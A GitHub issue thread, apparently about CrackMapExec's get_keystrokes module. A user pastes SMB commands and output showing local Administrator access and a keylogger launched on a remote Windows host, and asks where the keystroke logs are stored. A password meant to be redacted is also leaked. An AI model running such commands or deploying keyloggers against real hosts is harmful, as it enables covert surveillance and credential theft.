Closed Anton19780301 closed 2 years ago
it works perfectly, plz see folder where you installed your CME, check /.cme/logs file or folder within your Main folder of CrackMapexece
You redacted the password at the beginning and replaced it with "MyPassword", but further down you can see that it is "Gthtrk.xfntkm1"
this is when I tried to hide the password when posting here, I forgot to change it in one line. My mistake.
I will return to this task. It just doesn't work - where's the log? I use
crackmapexec smb 10.241.0.83 -u Administrator -p MyPassw0rd --local-auth -M get_keystrokes -o TIMEOUT=1 GET_KEYS... [] This module will not exit until CTRL-C is pressed GET_KEYS... [] Keystrokes will be stored in ~/.cme/logs
SMB 10.241.0.83 445 R9952-W11013402 [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:R9952-W11013402) (domain:R9952-W11013402) (signing:True) (SMBv1:True) SMB 10.241.0.83 445 R9952-W11013402 [+] R9952-W11013402\Administrator:MyPassw0rd (Pwn3d!) GET_KEYS... 10.241.0.83 445 R9952-W11013402 [+] Executed launcher
And ...... no logs in /root/home/.cme/logs
Is it possible to specify where to record the log manually? maybe he doesn’t understand all the keys? or writes not in all situations?
module removed
Good afternoon, how does get_keystrokes work? Where can I see a keylogger record? The wiki doesn't say anything about this. So I launched it It works (I think so)
root@kali:~/CrackMapExec# crackmapexec smb 10.241.0.83 -u Администратор -p MyPassword --local-auth -M get_keystrokes CME 10.241.0.83:445 R9952-W01340204 [*] Windows 6.3 Build 9600 (name:R9952-W01340204) (domain:REGIONS) CME 10.241.0.83:445 R9952-W01340204 [+] R9952-W01340204\Администратор:Gthtrk.xfntkm1 (Pwn3d!)
Its all.... What's next ?